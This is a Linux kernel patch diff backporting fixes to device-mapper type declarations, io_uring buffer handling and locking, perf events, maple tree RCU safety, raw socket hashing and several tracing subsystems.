+@@ -461,7 +461,7 @@ void *dm_get_mdptr(struct mapped_device *md);
+ /*
+  * A device can still be used while suspended, but I/O is deferred.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags);
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags);
+ int dm_resume(struct mapped_device *md);
+ 
+ /*
+@@ -481,7 +481,7 @@ struct gendisk *dm_disk(struct mapped_device *md);
+ int dm_suspended(struct dm_target *ti);
+ int dm_post_suspending(struct dm_target *ti);
+ int dm_noflush_suspending(struct dm_target *ti);
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors);
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors);
+ void dm_submit_bio_remap(struct bio *clone, struct bio *tgt_clone);
+ union map_info *dm_get_rq_mapinfo(struct request *rq);
+ 
+@@ -525,7 +525,7 @@ int dm_set_geometry(struct mapped_device *md, struct hd_geometry *geo);
+  * First create an empty table.
+  */
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md);
++		    unsigned int num_targets, struct mapped_device *md);
+ 
+ /*
+  * Then call this once for each target.
+diff --git a/include/linux/dm-bufio.h b/include/linux/dm-bufio.h
+index 15d9e15ca830d..1262d92ab88fc 100644
+--- a/include/linux/dm-bufio.h
++++ b/include/linux/dm-bufio.h
+@@ -26,8 +26,8 @@ struct dm_buffer;
+  * Create a buffered IO cache on a given device
+  */
+ struct dm_bufio_client *
+-dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-		       unsigned reserved_buffers, unsigned aux_size,
++dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++		       unsigned int reserved_buffers, unsigned int aux_size,
+ 		       void (*alloc_callback)(struct dm_buffer *),
+ 		       void (*write_callback)(struct dm_buffer *),
+ 		       unsigned int flags);
+@@ -81,7 +81,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+  * I/O to finish.
+  */
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks);
++		       sector_t block, unsigned int n_blocks);
+ 
+ /*
+  * Release a reference obtained with dm_bufio_{read,get,new}. The data
+@@ -106,7 +106,7 @@ void dm_bufio_mark_buffer_dirty(struct dm_buffer *b);
+  * write the specified part of the buffer or it may write a larger superset.
+  */
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end);
++					unsigned int start, unsigned int end);
+ 
+ /*
+  * Initiate writing of dirty buffers, without waiting for completion.
+@@ -152,9 +152,9 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ /*
+  * Set the minimum number of buffers before cleanup happens.
+  */
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n);
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c);
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c);
+ sector_t dm_bufio_get_device_size(struct dm_bufio_client *c);
+ struct dm_io_client *dm_bufio_get_dm_io_client(struct dm_bufio_client *c);
+ sector_t dm_bufio_get_block_number(struct dm_buffer *b);
+diff --git a/include/linux/dm-dirty-log.h b/include/linux/dm-dirty-log.h
+index 7084503c3405f..843c857f07b0d 100644
+--- a/include/linux/dm-dirty-log.h
++++ b/include/linux/dm-dirty-log.h
+@@ -33,7 +33,7 @@ struct dm_dirty_log_type {
+ 	struct list_head list;
+ 
+ 	int (*ctr)(struct dm_dirty_log *log, struct dm_target *ti,
+-		   unsigned argc, char **argv);
++		   unsigned int argc, char **argv);
+ 	void (*dtr)(struct dm_dirty_log *log);
+ 
+ 	/*
+@@ -116,7 +116,7 @@ struct dm_dirty_log_type {
+ 	 * Support function for mirror status requests.
+ 	 */
+ 	int (*status)(struct dm_dirty_log *log, status_type_t status_type,
+-		      char *result, unsigned maxlen);
++		      char *result, unsigned int maxlen);
+ 
+ 	/*
+ 	 * is_remote_recovering is necessary for cluster mirroring. It provides
+@@ -139,7 +139,7 @@ int dm_dirty_log_type_unregister(struct dm_dirty_log_type *type);
+ struct dm_dirty_log *dm_dirty_log_create(const char *type_name,
+ 			struct dm_target *ti,
+ 			int (*flush_callback_fn)(struct dm_target *ti),
+-			unsigned argc, char **argv);
++			unsigned int argc, char **argv);
+ void dm_dirty_log_destroy(struct dm_dirty_log *log);
+ 
+ #endif	/* __KERNEL__ */
+diff --git a/include/linux/dm-io.h b/include/linux/dm-io.h
+index 8e1c4ab5df043..92e7abfe04f92 100644
+--- a/include/linux/dm-io.h
++++ b/include/linux/dm-io.h
+@@ -26,7 +26,7 @@ struct page_list {
+ 	struct page *page;
+ };
+ 
+-typedef void (*io_notify_fn)(unsigned long error, void *context);
++typedef void (*io_notify_fn)(unsigned int long error, void *context);
+ 
+ enum dm_io_mem_type {
+ 	DM_IO_PAGE_LIST,/* Page list */
+@@ -38,7 +38,7 @@ enum dm_io_mem_type {
+ struct dm_io_memory {
+ 	enum dm_io_mem_type type;
+ 
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	union {
+ 		struct page_list *pl;
+@@ -78,8 +78,8 @@ void dm_io_client_destroy(struct dm_io_client *client);
+  * Each bit in the optional 'sync_error_bits' bitset indicates whether an
+  * error occurred doing io to the corresponding region.
+  */
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
+-	  struct dm_io_region *region, unsigned long *sync_error_bits);
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
++	  struct dm_io_region *region, unsigned int long *sync_error_bits);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_IO_H */
+diff --git a/include/linux/dm-kcopyd.h b/include/linux/dm-kcopyd.h
+index c1707ee5b5408..68c412b31b788 100644
+--- a/include/linux/dm-kcopyd.h
++++ b/include/linux/dm-kcopyd.h
+@@ -23,11 +23,11 @@
+ #define DM_KCOPYD_WRITE_SEQ    2
+ 
+ struct dm_kcopyd_throttle {
+-	unsigned throttle;
+-	unsigned num_io_jobs;
+-	unsigned io_period;
+-	unsigned total_period;
+-	unsigned last_jiffies;
++	unsigned int throttle;
++	unsigned int num_io_jobs;
++	unsigned int io_period;
++	unsigned int total_period;
++	unsigned int last_jiffies;
+ };
+ 
+ /*
+@@ -60,12 +60,12 @@ void dm_kcopyd_client_flush(struct dm_kcopyd_client *kc);
+  * read_err is a boolean,
+  * write_err is a bitset, with 1 bit for each destination region
+  */
+-typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned long write_err,
++typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned int long write_err,
+ 				    void *context);
+ 
+ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ /*
+  * Prepare a callback and submit it via the kcopyd thread.
+@@ -80,11 +80,11 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+  */
+ void *dm_kcopyd_prepare_callback(struct dm_kcopyd_client *kc,
+ 				 dm_kcopyd_notify_fn fn, void *context);
+-void dm_kcopyd_do_callback(void *job, int read_err, unsigned long write_err);
++void dm_kcopyd_do_callback(void *job, int read_err, unsigned int long write_err);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_KCOPYD_H */
+diff --git a/include/linux/dm-region-hash.h b/include/linux/dm-region-hash.h
+index 9e2a7a401df50..e8691539e1d77 100644
+--- a/include/linux/dm-region-hash.h
++++ b/include/linux/dm-region-hash.h
+@@ -37,7 +37,7 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions);
+ void dm_region_hash_destroy(struct dm_region_hash *rh);
+diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
+index 99f1146614c04..f4f9787d6a86b 100644
+--- a/include/linux/ftrace.h
++++ b/include/linux/ftrace.h
+@@ -970,7 +970,7 @@ static inline void __ftrace_enabled_restore(int enabled)
+ #define CALLER_ADDR5 ((unsigned long)ftrace_return_address(5))
+ #define CALLER_ADDR6 ((unsigned long)ftrace_return_address(6))
+ 
+-static inline unsigned long get_lock_parent_ip(void)
++static __always_inline unsigned long get_lock_parent_ip(void)
+ {
+ 	unsigned long addr = CALLER_ADDR0;
+ 
+diff --git a/include/linux/mm_types.h b/include/linux/mm_types.h
+index 9757067c30537..0e41359d364a6 100644
+--- a/include/linux/mm_types.h
++++ b/include/linux/mm_types.h
+@@ -810,7 +810,8 @@ struct mm_struct {
+ 	unsigned long cpu_bitmap[];
+ };
+ 
+-#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN)
++#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN | \
++			 MT_FLAGS_USE_RCU)
+ extern struct mm_struct init_mm;
+ 
+ /* Pointer magic because the dynamic array size confuses some compilers. */
+diff --git a/include/linux/pci-doe.h b/include/linux/pci-doe.h
+index ed9b4df792b88..43765eaf2342c 100644
+--- a/include/linux/pci-doe.h
++++ b/include/linux/pci-doe.h
+@@ -34,6 +34,10 @@ struct pci_doe_mb;
+  * @work: Used internally by the mailbox
+  * @doe_mb: Used internally by the mailbox
+  *
++ * Payloads are treated as opaque byte streams which are transmitted verbatim,
++ * without byte-swapping.  If payloads contain little-endian register values,
++ * the caller is responsible for conversion with cpu_to_le32() / le32_to_cpu().
++ *
+  * The payload sizes and rv are specified in bytes with the following
+  * restrictions concerning the protocol.
+  *
+@@ -45,9 +49,9 @@ struct pci_doe_mb;
+  */
+ struct pci_doe_task {
+ 	struct pci_doe_protocol prot;
+-	u32 *request_pl;
++	__le32 *request_pl;
+ 	size_t request_pl_sz;
+-	u32 *response_pl;
++	__le32 *response_pl;
+ 	size_t response_pl_sz;
+ 	int rv;
+ 	void (*complete)(struct pci_doe_task *task);
+diff --git a/include/linux/phylink.h b/include/linux/phylink.h
+index c492c26202b5b..637698ed5cb6c 100644
+--- a/include/linux/phylink.h
++++ b/include/linux/phylink.h
+@@ -574,6 +574,7 @@ struct phylink *phylink_create(struct phylink_config *, struct fwnode_handle *,
+ 			       phy_interface_t iface,
+ 			       const struct phylink_mac_ops *mac_ops);
+ void phylink_destroy(struct phylink *);
++bool phylink_expects_phy(struct phylink *pl);
+ 
+ int phylink_connect_phy(struct phylink *, struct phy_device *);
+ int phylink_of_phy_connect(struct phylink *, struct device_node *, u32 flags);
+diff --git a/include/net/raw.h b/include/net/raw.h
+index 5e665934ebc7c..3af5289fdead9 100644
+--- a/include/net/raw.h
++++ b/include/net/raw.h
+@@ -15,6 +15,8 @@
+ 
+ #include <net/inet_sock.h>
+ #include <net/protocol.h>
++#include <net/netns/hash.h>
++#include <linux/hash.h>
+ #include <linux/icmp.h>
+ 
+ extern struct proto raw_prot;
+@@ -29,20 +31,27 @@ int raw_local_deliver(struct sk_buff *, int);
+ 
+ int raw_rcv(struct sock *, struct sk_buff *);
+ 
+-#define RAW_HTABLE_SIZE	MAX_INET_PROTOS
++#define RAW_HTABLE_LOG	8
++#define RAW_HTABLE_SIZE	(1U << RAW_HTABLE_LOG)
+ 
+ struct raw_hashinfo {
+ 	spinlock_t lock;
+-	struct hlist_nulls_head ht[RAW_HTABLE_SIZE];
++
++	struct hlist_head ht[RAW_HTABLE_SIZE] ____cacheline_aligned;
+ };
+ 
++static inline u32 raw_hashfunc(const struct net *net, u32 proto)
++{
++	return hash_32(net_hash_mix(net) ^ proto, RAW_HTABLE_LOG);
++}
++
+ static inline void raw_hashinfo_init(struct raw_hashinfo *hashinfo)
+ {
+ 	int i;
+ 
+ 	spin_lock_init(&hashinfo->lock);
+ 	for (i = 0; i < RAW_HTABLE_SIZE; i++)
+-		INIT_HLIST_NULLS_HEAD(&hashinfo->ht[i], i);
++		INIT_HLIST_HEAD(&hashinfo->ht[i]);
+ }
+ 
+ #ifdef CONFIG_PROC_FS
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index a4e9dbc7b67a8..add5cff7952c5 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2722,8 +2722,8 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
+ 	io_eventfd_unregister(ctx);
+ 	io_alloc_cache_free(&ctx->apoll_cache, io_apoll_cache_free);
+ 	io_alloc_cache_free(&ctx->netmsg_cache, io_netmsg_cache_free);
+-	mutex_unlock(&ctx->uring_lock);
+ 	io_destroy_buffers(ctx);
++	mutex_unlock(&ctx->uring_lock);
+ 	if (ctx->sq_creds)
+ 		put_cred(ctx->sq_creds);
+ 	if (ctx->submitter_task)
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 3002dc8271959..a90c820ce99e1 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -228,17 +228,18 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
+ 		return i;
+ 	}
+ 
+-	/* the head kbuf is the list itself */
++	/* protects io_buffers_cache */
++	lockdep_assert_held(&ctx->uring_lock);
++
+ 	while (!list_empty(&bl->buf_list)) {
+ 		struct io_buffer *nxt;
+ 
+ 		nxt = list_first_entry(&bl->buf_list, struct io_buffer, list);
+-		list_del(&nxt->list);
++		list_move(&nxt->list, &ctx->io_buffers_cache);
+ 		if (++i == nbufs)
+ 			return i;
+ 		cond_resched();
+ 	}
+-	i++;
+ 
+ 	return i;
+ }
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index fad170b475921..daecb8c9126b0 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -12155,7 +12155,7 @@ perf_event_set_output(struct perf_event *event, struct perf_event *output_event)
+ 	/*
+ 	 * If its not a per-cpu rb, it must be the same task.
+ 	 */
+-	if (output_event->cpu == -1 && output_event->ctx != event->ctx)
++	if (output_event->cpu == -1 && output_event->hw.target != event->hw.target)
+ 		goto out;
+ 
+ 	/*
+@@ -12875,12 +12875,14 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
+ 	__perf_pmu_remove(src_ctx, src_cpu, pmu, &src_ctx->pinned_groups, &events);
+ 	__perf_pmu_remove(src_ctx, src_cpu, pmu, &src_ctx->flexible_groups, &events);
+ 
+-	/*
+-	 * Wait for the events to quiesce before re-instating them.
+-	 */
+-	synchronize_rcu();
++	if (!list_empty(&events)) {
++		/*
++		 * Wait for the events to quiesce before re-instating them.
++		 */
++		synchronize_rcu();
+ 
+-	__perf_pmu_install(dst_ctx, dst_cpu, pmu, &events);
++		__perf_pmu_install(dst_ctx, dst_cpu, pmu, &events);
++	}
+ 
+ 	mutex_unlock(&dst_ctx->mutex);
+ 	mutex_unlock(&src_ctx->mutex);
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 8dd0127ddcb8d..e8808ffbea619 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -617,6 +617,7 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	if (retval)
+ 		goto out;
+ 
++	mt_clear_in_rcu(mas.tree);
+ 	mas_for_each(&old_mas, mpnt, ULONG_MAX) {
+ 		struct file *file;
+ 
+@@ -703,6 +704,8 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	retval = arch_dup_mmap(oldmm, mm);
+ loop_out:
+ 	mas_destroy(&mas);
++	if (!retval)
++		mt_set_in_rcu(mas.tree);
+ out:
+ 	mmap_write_unlock(mm);
+ 	flush_tlb_mm(oldmm);
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index a47f7d93e32d2..5f662d1353727 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -5568,12 +5568,15 @@ int modify_ftrace_direct(unsigned long ip,
+ 		ret = 0;
+ 	}
+ 
+-	if (unlikely(ret && new_direct)) {
+-		direct->count++;
+-		list_del_rcu(&new_direct->next);
+-		synchronize_rcu_tasks();
+-		kfree(new_direct);
+-		ftrace_direct_func_count--;
++	if (ret) {
++		direct->addr = old_addr;
++		if (unlikely(new_direct)) {
++			direct->count++;
++			list_del_rcu(&new_direct->next);
++			synchronize_rcu_tasks();
++			kfree(new_direct);
++			ftrace_direct_func_count--;
++		}
+ 	}
+ 
+  out_unlock:
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 20cd8c9d245e2..12da17243747d 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -3102,6 +3102,10 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 		if (RB_WARN_ON(cpu_buffer,
+ 			       rb_is_reader_page(cpu_buffer->tail_page)))
+ 			return;
++		/*
++		 * No need for a memory barrier here, as the update
++		 * of the tail_page did it for this page.
++		 */
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		rb_inc_page(&cpu_buffer->commit_page);
+@@ -3111,6 +3115,8 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 	while (rb_commit_index(cpu_buffer) !=
+ 	       rb_page_write(cpu_buffer->commit_page)) {
+ 
++		/* Make sure the readers see the content of what is committed. */
++		smp_wmb();
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		RB_WARN_ON(cpu_buffer,
+@@ -4688,7 +4694,12 @@ rb_get_reader_page(struct ring_buffer_per_cpu *cpu_buffer)
+ 
+ 	/*
+ 	 * Make sure we see any padding after the write update
+-	 * (see rb_reset_tail())
++	 * (see rb_reset_tail()).
++	 *
++	 * In addition, a writer may be writing on the reader page
++	 * if the page has not been fully filled, so the read barrier
++	 * is also needed to make sure we see the content of what is
++	 * committed by the writer (see rb_set_commit_to_write()).
+ 	 */
+ 	smp_rmb();
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 1b692574fb0ca..1a931896ba042 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9472,6 +9472,7 @@ static int __remove_instance(struct trace_array *tr)
+ 	tracefs_remove(tr->dir);
+ 	free_percpu(tr->last_func_repeats);
+ 	free_trace_buffers(tr);
++	clear_tracing_err_log(tr);
+ 
+ 	for (i = 0; i < tr->nr_topts; i++) {
+ 		kfree(tr->topts[i].topts);
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index 67592eed0be8d..89083ae1aebe3 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -44,14 +44,21 @@ enum { ERRORS };
+ 
+ static const char *err_text[] = { ERRORS };
+ 
++static DEFINE_MUTEX(lastcmd_mutex);
+ static char *last_cmd;
+ 
+ static int errpos(const char *str)
+ {
++	int ret = 0;
++
++	mutex_lock(&lastcmd_mutex);
+ 	if (!str || !last_cmd)
+-		return 0;
++		goto out;
+ 
+-	return err_pos(last_cmd, str);
++	ret = err_pos(last_cmd, str);
++ out:
++	mutex_unlock(&lastcmd_mutex);
++	return ret;
+ }
+ 
+ static void last_cmd_set(const char *str)
+@@ -59,18 +66,22 @@ static void last_cmd_set(const char *str)
+ 	if (!str)
+ 		return;
+ 
++	mutex_lock(&lastcmd_mutex);
+ 	kfree(last_cmd);
+-
+ 	last_cmd = kstrdup(str, GFP_KERNEL);
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static void synth_err(u8 err_type, u16 err_pos)
+ {
++	mutex_lock(&lastcmd_mutex);
+ 	if (!last_cmd)
+-		return;
++		goto out;
+ 
+ 	tracing_log_err(NULL, "synthetic_events", last_cmd, err_text,
+ 			err_type, err_pos);
++ out:
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static int create_synth_event(const char *raw_command);
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 210e1f1683929..2a1b337ac6434 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -1296,7 +1296,7 @@ static void notify_new_max_latency(u64 latency)
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(inst, &osnoise_instances, list) {
+ 		tr = inst->tr;
+-		if (tr->max_latency < latency) {
++		if (tracer_tracing_is_on(tr) && tr->max_latency < latency) {
+ 			tr->max_latency = latency;
+ 			latency_fsnotify(tr);
+ 		}
+@@ -1738,6 +1738,8 @@ static int timerlat_main(void *data)
+ 
+ 		trace_timerlat_sample(&s);
+ 
++		notify_new_max_latency(diff);
++
+ 		timerlat_dump_stack(time_to_us(diff));
+ 
+ 		tlat->tracing_thread = false;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index a63594bef72ea..fb452873914f2 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -149,13 +149,12 @@ struct maple_subtree_state {
+ /* Functions */
+ static inline struct maple_node *mt_alloc_one(gfp_t gfp)
+ {
+-	return kmem_cache_alloc(maple_node_cache, gfp | __GFP_ZERO);
++	return kmem_cache_alloc(maple_node_cache, gfp);
+ }
+ 
+ static inline int mt_alloc_bulk(gfp_t gfp, size_t size, void **nodes)
+ {
+-	return kmem_cache_alloc_bulk(maple_node_cache, gfp | __GFP_ZERO, size,
+-				     nodes);
++	return kmem_cache_alloc_bulk(maple_node_cache, gfp, size, nodes);
+ }
+ 
+ static inline void mt_free_bulk(size_t size, void __rcu **nodes)
+@@ -535,11 +534,14 @@ static inline struct maple_node *mte_parent(const struct maple_enode *enode)
+  */
+ static inline bool ma_dead_node(const struct maple_node *node)
+ {
+-	struct maple_node *parent = (void *)((unsigned long)
+-					     node->parent & ~MAPLE_NODE_MASK);
++	struct maple_node *parent;
+ 
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
++	parent = (void *)((unsigned long) node->parent & ~MAPLE_NODE_MASK);
+ 	return (parent == node);
+ }
++
+ /*
+  * mte_dead_node() - check if the @enode is dead.
+  * @enode: The encoded maple node
+@@ -551,6 +553,8 @@ static inline bool mte_dead_node(const struct maple_enode *enode)
+ 	struct maple_node *parent, *node;
+ 
+ 	node = mte_to_node(enode);
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
+ 	parent = mte_parent(enode);
+ 	return (parent == node);
+ }
+@@ -621,6 +625,8 @@ static inline unsigned int mas_alloc_req(const struct ma_state *mas)
+  * @node - the maple node
+  * @type - the node type
+  *
++ * In the event of a dead node, this array may be %NULL
++ *
+  * Return: A pointer to the maple node pivots
+  */
+ static inline unsigned long *ma_pivots(struct maple_node *node,
+@@ -813,6 +819,11 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ 	return rcu_dereference_check(slots[offset], mt_locked(mt));
+ }
+ 
++static inline void *mt_slot_locked(struct maple_tree *mt, void __rcu **slots,
++				   unsigned char offset)
++{
++	return rcu_dereference_protected(slots[offset], mt_locked(mt));
++}
+ /*
+  * mas_slot_locked() - Get the slot value when holding the maple tree lock.
+  * @mas: The maple state
+@@ -824,7 +835,7 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ static inline void *mas_slot_locked(struct ma_state *mas, void __rcu **slots,
+ 				       unsigned char offset)
+ {
+-	return rcu_dereference_protected(slots[offset], mt_locked(mas->tree));
++	return mt_slot_locked(mas->tree, slots, offset);
+ }
+ 
+ /*
+@@ -895,6 +906,45 @@ static inline void ma_set_meta(struct maple_node *mn, enum maple_type mt,
+ 	meta->end = end;
+ }
+ 
++/*
++ * mt_clear_meta() - clear the metadata information of a node, if it exists
++ * @mt: The maple tree
++ * @mn: The maple node
++ * @type: The maple node type
++ * @offset: The offset of the highest sub-gap in this node.
++ * @end: The end of the data in this node.
++ */
++static inline void mt_clear_meta(struct maple_tree *mt, struct maple_node *mn,
++				  enum maple_type type)
++{
++	struct maple_metadata *meta;
++	unsigned long *pivots;
++	void __rcu **slots;
++	void *next;
++
++	switch (type) {
++	case maple_range_64:
++		pivots = mn->mr64.pivot;
++		if (unlikely(pivots[MAPLE_RANGE64_SLOTS - 2])) {
++			slots = mn->mr64.slot;
++			next = mt_slot_locked(mt, slots,
++					      MAPLE_RANGE64_SLOTS - 1);
++			if (unlikely((mte_to_node(next) &&
++				      mte_node_type(next))))
++				return; /* no metadata, could be node */
++		}
++		fallthrough;
++	case maple_arange_64:
++		meta = ma_meta(mn, type);
++		break;
++	default:
++		return;
++	}
++
++	meta->gap = 0;
++	meta->end = 0;
++}
++
+ /*
+  * ma_meta_end() - Get the data end of a node from the metadata
+  * @mn: The maple node
+@@ -1092,8 +1142,11 @@ static int mas_ascend(struct ma_state *mas)
+ 		a_type = mas_parent_enum(mas, p_enode);
+ 		a_node = mte_parent(p_enode);
+ 		a_slot = mte_parent_slot(p_enode);
+-		pivots = ma_pivots(a_node, a_type);
+ 		a_enode = mt_mk_node(a_node, a_type);
++		pivots = ma_pivots(a_node, a_type);
++
++		if (unlikely(ma_dead_node(a_node)))
++			return 1;
+ 
+ 		if (!set_min && a_slot) {
+ 			set_min = true;
+@@ -1128,9 +1181,10 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ {
+ 	struct maple_alloc *ret, *node = mas->alloc;
+ 	unsigned long total = mas_allocated(mas);
++	unsigned int req = mas_alloc_req(mas);
+ 
+ 	/* nothing or a request pending. */
+-	if (unlikely(!total))
++	if (WARN_ON(!total))
+ 		return NULL;
+ 
+ 	if (total == 1) {
+@@ -1140,27 +1194,25 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ 		goto single_node;
+ 	}
+ 
+-	if (!node->node_count) {
++	if (node->node_count == 1) {
+ 		/* Single allocation in this node. */
+ 		mas->alloc = node->slot[0];
+-		node->slot[0] = NULL;
+ 		mas->alloc->total = node->total - 1;
+ 		ret = node;
+ 		goto new_head;
+ 	}
+-
+ 	node->total--;
+-	ret = node->slot[node->node_count];
+-	node->slot[node->node_count--] = NULL;
++	ret = node->slot[--node->node_count];
++	node->slot[node->node_count] = NULL;
+ 
+ single_node:
+ new_head:
+-	ret->total = 0;
+-	ret->node_count = 0;
+-	if (ret->request_count) {
+-		mas_set_alloc_req(mas, ret->request_count + 1);
+-		ret->request_count = 0;
++	if (req) {
++		req++;
++		mas_set_alloc_req(mas, req);
+ 	}
++
++	memset(ret, 0, sizeof(*ret));
+ 	return (struct maple_node *)ret;
+ }
+ 
+@@ -1179,21 +1231,20 @@ static inline void mas_push_node(struct ma_state *mas, struct maple_node *used)
+ 	unsigned long count;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 
+-	memset(reuse, 0, sizeof(*reuse));
+ 	count = mas_allocated(mas);
+ 
+-	if (count && (head->node_count < MAPLE_ALLOC_SLOTS - 1)) {
+-		if (head->slot[0])
+-			head->node_count++;
+-		head->slot[head->node_count] = reuse;
++	reuse->request_count = 0;
++	reuse->node_count = 0;
++	if (count && (head->node_count < MAPLE_ALLOC_SLOTS)) {
++		head->slot[head->node_count++] = reuse;
+ 		head->total++;
+ 		goto done;
+ 	}
+ 
+ 	reuse->total = 1;
+ 	if ((head) && !((unsigned long)head & 0x1)) {
+-		head->request_count = 0;
+ 		reuse->slot[0] = head;
++		reuse->node_count = 1;
+ 		reuse->total += head->total;
+ 	}
+ 
+@@ -1212,7 +1263,6 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ {
+ 	struct maple_alloc *node;
+ 	unsigned long allocated = mas_allocated(mas);
+-	unsigned long success = allocated;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 	unsigned int count;
+ 	void **slots = NULL;
+@@ -1228,24 +1278,29 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 		WARN_ON(!allocated);
+ 	}
+ 
+-	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS - 1) {
++	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS) {
+ 		node = (struct maple_alloc *)mt_alloc_one(gfp);
+ 		if (!node)
+ 			goto nomem_one;
+ 
+-		if (allocated)
++		if (allocated) {
+ 			node->slot[0] = mas->alloc;
++			node->node_count = 1;
++		} else {
++			node->node_count = 0;
++		}
+ 
+-		success++;
+ 		mas->alloc = node;
++		node->total = ++allocated;
+ 		requested--;
+ 	}
+ 
+ 	node = mas->alloc;
++	node->request_count = 0;
+ 	while (requested) {
+ 		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->slot[0]) {
+-			unsigned int offset = node->node_count + 1;
++		if (node->node_count) {
++			unsigned int offset = node->node_count;
+ 
+ 			slots = (void **)&node->slot[offset];
+ 			max_req -= offset;
+@@ -1259,15 +1314,13 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 			goto nomem_bulk;
+ 
+ 		node->node_count += count;
+-		/* zero indexed. */
+-		if (slots == (void **)&node->slot)
+-			node->node_count--;
+-
+-		success += count;
++		allocated += count;
+ 		node = node->slot[0];
